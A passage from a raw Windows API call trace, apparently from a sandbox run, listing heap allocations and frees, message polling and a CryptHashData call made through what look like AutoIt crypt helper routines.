(HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0165.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0165.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a70 [0165.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0165.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0165.501] CryptHashData (hHash=0xa87050, pbData=0x2e54e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0165.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0165.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0165.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0165.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0165.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0165.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0165.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0165.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0165.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0165.504] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0165.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0165.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.505] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0165.505] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0165.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0165.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: 